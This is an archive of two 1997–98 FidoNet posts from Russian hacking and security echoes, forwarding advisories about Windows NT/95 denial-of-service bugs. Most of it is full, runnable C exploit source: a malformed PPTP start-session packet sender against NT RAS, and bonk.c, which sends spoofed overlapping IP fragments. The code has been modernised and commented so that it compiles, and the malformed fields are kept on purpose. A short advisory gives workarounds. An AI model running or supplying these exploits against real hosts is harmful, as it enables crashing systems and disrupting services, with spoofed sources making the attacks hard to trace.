DOS (Windoze NT RAS PPTP exploit)


_ RU.NETHACK (2:5077/15.22) _______________________________________ RU.NETHACK _
 From : Ricky Lyte                          2:5030/48.58    06 Dec 97  13:10:02 
 Subj : DOS (Windoze NT RAS PPTP exploit)                                                                    
________________________________________________________________________________
 AN>             Кто расскажет, что за тип атаки такой Denial of Service?

Бомбардировка сервера-жертвы, пока он либо «коньки не отбросит», либо не перестанет
реагировать на новые соединения.

Небольшой пример:

Date:         Wed, 26 Nov 1997 11:48:13 -0600
From:         Kevin Wormington <kworm@SOFNET.COM>
Subject:      Potential DOS in Windows NT RAS PPTP

Hi, this is my first posting so please excuse the style.  Please forgive me
if this has been posted before, but I have not seen it.  Also, I am unable
to test it with different hotfixes, etc.

I discovered that NT 4.0 w/SP3 and RAS PPTP is vulnerable to a DOS causing
core dump.  I have been working with point to point tunnelling protocol and
discovered (by accident) that if you send a pptp start session request with
an invalid packet length in the pptp packet header that it will crash an NT
box.

Here is a very crude code fragment that will exploit this behaviour:

/*
* Sample Windoze NT RAS PPTP exploit
*/
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <netdb.h>

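/*
 * PPTP control-connection wire format (TCP port 1723) as used by the request
 * built below.  Every multi-byte field is transmitted big-endian and the
 * structs are copied onto the wire byte for byte, so each field must have its
 * exact on-wire width.  The original declared the 32-bit fields as u_long,
 * which is 8 bytes on LP64 hosts: PptpPacketHeader then grows from 8 to 16
 * bytes and the two offsets below no longer land on the right bytes.  The
 * fixed-width types restore the intended layout on any host.
 */
#define PPTP_MAGIC_COOKIE       0x1a2b3c4d
#define PPTP_CONTROL_HEADER_OFFSET  8   /* == sizeof(PptpPacketHeader) */
#define PPTP_REQUEST_OFFSET  12         /* == PPTP_CONTROL_HEADER_OFFSET + sizeof(PptpControlHeader) */

/* Values of PptpPacketHeader.packetType. */
typedef enum {
  PPTP_CONTROL_PACKET = 1,
  PPTP_MGMT_PACKET} PptpPacketType;

/* Values of PptpControlHeader.messageType; numbered consecutively from 1. */
typedef enum {
  PPTP_START_SESSION_REQUEST = 1,
  PPTP_START_SESSION_REPLY,
  PPTP_STOP_SESSION_REQUEST,
  PPTP_STOP_SESSION_REPLY,
  PPTP_ECHO_REQUEST,
  PPTP_ECHO_REPLY,
  PPTP_OUT_CALL_REQUEST,
  PPTP_OUT_CALL_REPLY,
  PPTP_IN_CALL_REQUEST,
  PPTP_IN_CALL_REPLY,
  PPTP_IN_CALL_CONNECTED,
  PPTP_CALL_CLEAR_REQUEST,
  PPTP_CALL_DISCONNECT_NOTIFY,
  PPTP_WAN_ERROR_NOTIFY,
  PPTP_SET_LINK_INFO,
  PPTP_NUMBER_OF_CONTROL_MESSAGES} PptpControlMessageType;

/* Common 8-byte header at the start of every control packet. */
typedef struct {
  uint16_t   packetLength;   /* on-wire packet length; the request below deliberately sends a wrong value */
  uint16_t   packetType;     /* PptpPacketType */
  uint32_t   magicCookie;    /* PPTP_MAGIC_COOKIE */
} PptpPacketHeader;

/* 4 bytes that follow the packet header on control packets. */
typedef struct {
  uint16_t   messageType;    /* PptpControlMessageType */
  uint16_t   reserved;
} PptpControlHeader;

typedef struct {
  uint32_t   identNumber;
} PptpEchoRequest;

typedef enum {
  PPTP_ECHO_OK = 1,
  PPTP_ECHO_GENERAL_ERROR} PptpEchoReplyResultCode;

typedef struct {
  uint32_t   identNumber;
  uint8_t    resultCode;     /* PptpEchoReplyResultCode */
  uint8_t    generalErrorCode;
  uint16_t   reserved;
} PptpEchoReply;

#define PPTP_FRAME_CAP_ASYNC      0x00000001L
#define PPTP_FRAME_CAP_SYNC       0x00000002L
#define PPTP_BEARER_CAP_ANALOG    0x00000001L
#define PPTP_BEARER_CAP_DIGITAL   0x00000002L

/* Body of a Start-Control-Connection-Request: 144 bytes on the wire. */
typedef struct {
  uint16_t    protocolVersion;
  uint8_t     reserved1;
  uint8_t     reserved2;
  uint32_t    framingCapability;  /* PPTP_FRAME_CAP_* bits */
  uint32_t    bearerCapability;   /* PPTP_BEARER_CAP_* bits */
  uint16_t    maxChannels;
  uint16_t    firmwareRevision;
  char        hostName[64];
  char        vendorString[64];
} PptpStartSessionRequest;

/* Defined below: builds the (malformed) request and writes it to the connected socket. */
int pptp_start_session (int);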
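/*
 * Connect to the PPTP control port (tcp/1723) of the host named in argv[1]
 * and send one malformed Start-Control-Connection-Request.
 *
 * Returns 0 once the request has been written, 1 on a usage, resolution,
 * connection or send failure (the original exit(1)'d on the same paths).
 * Fixes over the original: argv[1] is checked before use (gethostbyname(NULL)
 * was reached with no argument), the error path closed an uninitialised
 * descriptor `s` instead of the socket, and a non-IPv4 answer was silently
 * truncated into sin_addr instead of being rejected.
 */
int main(int argc, char **argv)
{
    int pptp_sock;
    struct sockaddr_in sn;
    struct hostent *hp;
    struct servent *sp;

    if (argc < 2) {
        fprintf(stderr, "usage: %s <target-host>\n", argv[0]);
        return 1;
    }

    pptp_sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (pptp_sock < 0) {
        perror("tcp socket");
        return 1;
    }

    hp = gethostbyname(argv[1]);
    if (!hp) {
        fprintf(stderr, "Address no good.\n");
        close(pptp_sock);
        return 1;
    }
    /* Only an IPv4 address fits sockaddr_in; refuse anything else outright. */
    if (hp->h_addrtype != AF_INET || hp->h_length != (int)sizeof(sn.sin_addr)
        || hp->h_addr_list[0] == NULL) {
        fprintf(stderr, "pptp: %s did not resolve to an IPv4 address\n", argv[1]);
        close(pptp_sock);
        return 1;
    }

    memset(&sn, 0, sizeof(sn));
    sn.sin_family = AF_INET;
    /* s_port is already in network byte order; fall back to the well-known
       port when /etc/services has no "pptp" entry. */
    sp = getservbyname("pptp", "tcp");
    sn.sin_port = sp ? (in_port_t)sp->s_port : htons(1723);
    memcpy(&sn.sin_addr, hp->h_addr_list[0], sizeof(sn.sin_addr));

    if (connect(pptp_sock, (struct sockaddr *)&sn, sizeof(sn)) < 0) {
        perror("pptp: can't connect");
        close(pptp_sock);
        return 1;
    }

    if (pptp_start_session(pptp_sock) != 0) {
        perror("pptp: send");
        close(pptp_sock);
        return 1;
    }

    fprintf(stderr, "Done\n");
    close(pptp_sock);
    return 0;
}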
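/*
 * Build one PPTP Start-Control-Connection-Request and write it to the
 * connected socket `sock`.
 *
 * The packet is intentionally malformed: packetLength claims 20 bytes while
 * 156 bytes (8-byte packet header + 4-byte control header + 144-byte request)
 * are actually sent.  That length mismatch is what the advisory above
 * describes as crashing NT 4.0 SP3 RAS, so it must not be "corrected".
 *
 * Returns 0 when the whole packet was written, -1 (errno left as set by
 * send(2)) on a send error or a short write.  The original ignored the
 * result of send() and always returned 0.
 */
int pptp_start_session (int sock)
  {
  PptpPacketHeader packetheader;
  PptpControlHeader controlheader;
  PptpStartSessionRequest sessionrequest;
  char packet[PPTP_REQUEST_OFFSET + sizeof(PptpStartSessionRequest)];
  const size_t packet_len = sizeof(packet);     /* 156 */
  ssize_t sent;

  /* Deliberately bogus on-wire length (see header comment). */
  packetheader.packetLength = htons(20);
  packetheader.packetType = htons(PPTP_CONTROL_PACKET);
  packetheader.magicCookie = htonl(PPTP_MAGIC_COOKIE);

  controlheader.messageType = htons(PPTP_START_SESSION_REQUEST);
  controlheader.reserved = 0;

  /* Zero the whole request first so padding bytes never carry stack data. */
  memset(&sessionrequest, 0, sizeof(sessionrequest));
  sessionrequest.protocolVersion = htons(1);
  sessionrequest.framingCapability = htonl(PPTP_FRAME_CAP_ASYNC);
  sessionrequest.bearerCapability = htonl(PPTP_BEARER_CAP_ANALOG);
  sessionrequest.maxChannels = htons(32);
  sessionrequest.firmwareRevision = htons(1);
  /* snprintf instead of sprintf: bounded and always NUL-terminated. */
  snprintf(sessionrequest.hostName, sizeof(sessionrequest.hostName), "%s", "mypc.anywhere.com");
  snprintf(sessionrequest.vendorString, sizeof(sessionrequest.vendorString), "%s", "Any Vendor");

  memset(packet, 0, sizeof(packet));
  memcpy(packet, &packetheader, sizeof(packetheader));
  memcpy(packet + PPTP_CONTROL_HEADER_OFFSET, &controlheader, sizeof(controlheader));
  memcpy(packet + PPTP_REQUEST_OFFSET, &sessionrequest, sizeof(sessionrequest));

  sent = send(sock, packet, packet_len, 0);
  if (sent < 0 || (size_t)sent != packet_len)
    return -1;
  return 0;
  }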

 AN>             Или вот еще вопpос : можно ли как-нибудь обойти shadowing
 AN> ?

Об этом — в следующем сообщении.


                                            Team Porno-Grafica

--- 1984!
 * Origin: Welcome to the world of Emotional Degradation! (2:5030/48.58)

_ Hе ходи! Засекурят (2:5077/15.22) ______________________________ RU.SECURITY _
 From : Stas Filshtinskiy                   2:461/33.47     10 Jan 98  09:57:20 
 Subj : new DOS attack                                                          
________________________________________________________________________________
   Приветствую тебя, All!

Вот почитайте ... опять ...

-----Original Message-----
From:   Jiva DeVoe [SMTP:jiva@devware.com]
Sent:   Thursday, January 08, 1998 7:53 PM
To:     ntsecurity@iss.net
Subject:        [NTSEC] New DOS exploit for NT and Win95 (CONFIRMED)

TO UNSUBSCRIBE: email "unsubscribe ntsecurity" to majordomo@iss.net
Contact ntsecurity-owner@iss.net for help with any problems!
---------------------------------------------------------------------------

This is just an FYI.  I have confirmed and reproduced a new Denial of
Service exploit for Windows NT and Windows95.  Under Windows NT this
exploit causes a proverbial BSOD, under Windows95, this causes an
exception in IFSMGR.VXD.

This exploit has been reported to Microsoft!

Details

Without putting out a blueprint of how to cause this.  This is a
modified teardrop attack.  (NOTE: This DOES affect machines patched
against teardrop)  It utilizes UDP packets with altered headers.  I have
also provided Microsoft with source code to this exploit.

Temporary Workaround

Any workaround that would have been implemented against teardrop should
work against this issue.  By default, the UDP packets used in this
exploit are aimed at very high port numbers.  So perhaps by blocking UDP
packets destined for high port numbers, you might be able to prevent
this attack.  However, since it can be aimed at any port, a clever user
could get around filters such as this.  I'd be happy to talk to anyone
about other alternatives for working around this issue.

Please feel free to repost this to NTBUGTRAQ (I'm not on that list) or
wherever else you choose.

-------------
Jiva DeVoe
MCSE
Devware Systems
jiva@devware.com

И еще

-----Original Message-----
From:   Ken Williams [SMTP:jkwilli2@unity.ncsu.edu]
Sent:   Friday, January 09, 1998 8:14 AM
To:     NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM; ntsecurity@iss.net
Subject:        [NTSEC] bonk.c - modified teardrop attack that affects patched
NT and Win95

TO UNSUBSCRIBE: email "unsubscribe ntsecurity" to majordomo@iss.net
Contact ntsecurity-owner@iss.net for help with any problems!
---------------------------------------------------------------------------

here is the forwarded source code for the modified teardrop attack that
*supposedly* affects all patched NT and Win95 boxes.

Ken

/<--------------{ TATTOOMAN -aka- rute }-------------->\
  NCSU Computer Science    Member of E.H.A.P.
  jkwilli2@unity.ncsu.edu  http://www.hackers.com/ehap/
  UNIX ICQ UIN# 4231260    ehap@hackers.com
  FTP Site:  ftp://152.7.11.38/pub/personal/tattooman/
  WWW 2:     http://www4.ncsu.edu/~jkwilli2/
\<---------{ http://152.7.11.38/~tattooman/ }--------->/

---------- Forwarded message ----------
Date: 8 Jan 1998 20:52:46 -0000
From: announce-outgoing@rootshell.com
Cc: recipient list not shown:  ;
Subject: [rootshell] Security Bulletin #5

www.rootshell.com
Security Bulletin #5
January 8th, 1998

[ http://www.rootshell.com/ ]

----------------------------------------------------------------------

To unsubscribe from this mailing list send e-mail to majordomo@rootshell.com
with "unsubscribe announce" in the BODY of the message.

Send submissions to info@rootshell.com.  Messages sent will not be sent to
other members on this list unless it is featured in a security bulletin.

An archive of this list is available at :
http://www.rootshell.com/mailinglist-archive

----------------------------------------------------------------------

01. bonk.c - Modified teardrop attack.
--------------------------------------

These network DoS attacks sure are trendy now ...

/*
                                ==bendi - 1998==

                        bonk.c        -         5/01/1998
        Based On: teardrop.c by route|daemon9 & klepto
        Crashes *patched* win95/(NT?) machines.

        Basically, we set the frag offset > header length (teardrop
        reversed). There are many theories as to why this works;
        however, I do not have the resources to perform extensive testing.
        I make no warranties. Use this code at your own risk.
        Rip it if you like, I've had my fun.

*/

#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_udp.h>     /* pre-glibc header; glibc declares struct udphdr in <netinet/udp.h> */
#include <netinet/protocols.h>  /* pre-glibc header (IP_UDP); glibc has IPPROTO_UDP in <netinet/in.h> */
#include <arpa/inet.h>
#include <netdb.h>

#define FRG_CONST       0x3     /* payload bytes in the 2nd fragment; (FRG_CONST+1) is its offset in 8-byte units, i.e. 32 bytes */
#define PADDING         0x1c    /* UDP payload bytes (28) carried by the 1st fragment */

/* One raw IPv4 + UDP datagram exactly as written to the wire; filled in by fondle(). */
struct udp_pkt
{
        struct iphdr    ip;
        struct udphdr   udp;
        char data[PADDING];
} pkt;

int     udplen=sizeof(struct udphdr),
        iplen=sizeof(struct iphdr),
        datalen=100,                    /* not referenced anywhere in this listing */
        psize=sizeof(struct udphdr)+sizeof(struct iphdr)+PADDING,   /* bytes of the 1st fragment */
        spf_sck;                        /* raw IP_HDRINCL socket, opened in main(), closed by quit() */

/* Print the command-line synopsis on stderr and terminate (exit status 0, as before). */
void usage(void)
{
        fputs("Usage: ./bonk <src_addr> <dst_addr> [num]\n", stderr);
        exit(0);
}

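/*
 * Resolve host_name (a hostname or a dotted quad) to an IPv4 address in
 * network byte order.  Returns 0 on failure, which makes 0.0.0.0
 * indistinguishable from "not found"; both callers treat 0 as an error.
 *
 * The return type is in_addr_t: the function always produced a 32-bit IPv4
 * address, and callers that store it in a u_long are unaffected.
 *
 * The original copied h_length bytes into a u_long without checking the
 * address family, so a 16-byte AF_INET6 answer overflowed the destination.
 */
in_addr_t host_to_ip(const char *host_name)
{
        struct in_addr addr;
        struct hostent *res;

        if (host_name == NULL)
                return 0;
        res = gethostbyname(host_name);
        if (res == NULL || res->h_addrtype != AF_INET
            || res->h_length != (int)sizeof(addr) || res->h_addr_list[0] == NULL)
                return 0;
        memcpy(&addr, res->h_addr_list[0], sizeof(addr));
        return addr.s_addr;
}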

/* Report `reason` with perror(), release the raw socket and exit with status -1 (255 to the shell). */
void quit(char *reason)
{
        /* perror() first: close() may overwrite errno. */
        perror(reason);
        (void) close(spf_sck);
        exit(-1);
}

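/*
 * Send the two IP fragments that make up one "bonk" through the IP_HDRINCL
 * raw socket sck:
 *   1. offset 0, MF set, carrying the UDP header plus PADDING (28) payload
 *      bytes, i.e. transport bytes 0..35;
 *   2. MF clear, offset FRG_CONST+1 (32 bytes) with tot_len claiming
 *      FRG_CONST (3) more bytes, so the "last" fragment ends at byte 35,
 *      inside the span the first fragment already covered.
 * The IP checksum is left 0 (Linux fills it in for IP_HDRINCL sockets) and
 * the UDP checksum is 0, i.e. "none".
 *
 * Returns the byte count of the second sendto(), or -1 (errno set) if either
 * sendto() failed.  The original ignored the first call's result.
 *
 * NOTE(review): the second sendto() passes iplen + FRG_CONST + 1 bytes while
 * tot_len says iplen + FRG_CONST; this one-byte discrepancy is in the original
 * and is preserved as-is, since the code does not show whether it matters.
 */
int fondle(int sck, u_long src_addr, u_long dst_addr, int src_prt,
           int dst_prt)
{
        struct  sockaddr_in to;
        int     bs;

        memset(&pkt, 0, psize);

        /* IP header for the first fragment. */
        pkt.ip.version = 4;
        pkt.ip.ihl = 5;
        pkt.ip.tot_len = htons(udplen + iplen + PADDING);
        pkt.ip.id = htons(0x455);               /* same id on both fragments */
        pkt.ip.ttl = 255;
        pkt.ip.protocol = IPPROTO_UDP;          /* == IP_UDP (17) from the pre-glibc header */
        pkt.ip.saddr = src_addr;
        pkt.ip.daddr = dst_addr;
        pkt.ip.frag_off = htons(0x2000);        /* MF=1, offset 0 */

        /* UDP header; ports are whatever main() chose (53/53 by default). */
        pkt.udp.source = htons(src_prt);
        pkt.udp.dest = htons(dst_prt);
        pkt.udp.len = htons(8 + PADDING);

        /* Destination for sendto().  With IP_HDRINCL only the family and
           address are consulted (Linux ignores sin_port on raw sockets); the
           original stored an un-swapped src_prt here, which was never used. */
        memset(&to, 0, sizeof(to));
        to.sin_family = AF_INET;
        to.sin_addr.s_addr = dst_addr;

        if (sendto(sck, &pkt, psize, 0, (struct sockaddr *) &to, sizeof(to)) < 0)
                return -1;

        /* Second fragment: MF clear, offset 32 bytes, 3 bytes of payload. */
        pkt.ip.frag_off = htons(FRG_CONST + 1);
        pkt.ip.tot_len = htons(iplen + FRG_CONST);

        bs = sendto(sck, &pkt, iplen + FRG_CONST + 1, 0,
                (struct sockaddr *) &to, sizeof(to));
        return bs;
}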

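/*
 * bonk <src_addr> <dst_addr> [num]
 *
 * Sends `num` bonks (default 10) with the spoofed source address to the
 * target, 10 ms apart.  Opening a SOCK_RAW socket needs root (CAP_NET_RAW
 * on Linux).  Returns 0 on success; usage() and quit() terminate the process
 * on bad arguments or socket errors.
 *
 * Fixes over the original: `void main` is now int main; socket() failure is
 * detected by a negative return (the old `!spf_sck` test only caught
 * descriptor 0, which is a valid socket); the packet count is validated
 * instead of being taken from atoi() unchecked; a failed sendto() aborts the
 * run; the socket is closed on exit.
 */
int main(int argc, char *argv[])
{
        u_long  src_addr,
                dst_addr;
        int     i,
                src_prt = 53,
                dst_prt = 53,
                on = 1;
        long    pkt_count = 10;         /* default amount */

        /* Make quit() harmless before the socket exists (closing fd 0 otherwise). */
        spf_sck = -1;

        if (argc < 3 || argc > 4)
                usage();

        if (argc == 4) {
                char *end;
                pkt_count = strtol(argv[3], &end, 10);
                if (argv[3][0] == '\0' || *end != '\0'
                    || pkt_count <= 0 || pkt_count > INT_MAX) {
                        fprintf(stderr, "bonk: bad packet count '%s'\n", argv[3]);
                        exit(1);
                }
        }

        /* Resolve hostnames */
        src_addr = host_to_ip(argv[1]);
        if (!src_addr)
                quit("bad source host");
        dst_addr = host_to_ip(argv[2]);
        if (!dst_addr)
                quit("bad target host");

        spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
        if (spf_sck < 0)
                quit("socket()");
        if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0)
                quit("IP_HDRINCL");

        for (i = 0; i < pkt_count; ++i) {
                if (fondle(spf_sck, src_addr, dst_addr, src_prt, dst_prt) < 0)
                        quit("sendto()");
                usleep(10000);
        }

        printf("Done.\n");
        close(spf_sck);
        return 0;
}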

----------------------------------------------------------------------

To unsubscribe from this mailing list send e-mail to majordomo@rootshell.com
with "unsubscribe announce" in the BODY of the message.

Send submissions to info@rootshell.com.  Messages sent will not be sent to
other members on this list unless it is featured in a security bulletin.

An archive of this list is available at :
http://www.rootshell.com/mailinglist-archive

----------------------------------------------------------------------



    С уважением,
                            Stas
                    Sat Jan 10 1998 09:58.

--- GEcho 1.20/Pro
 * Origin: 4F @ Home ! (2:461/33.47)


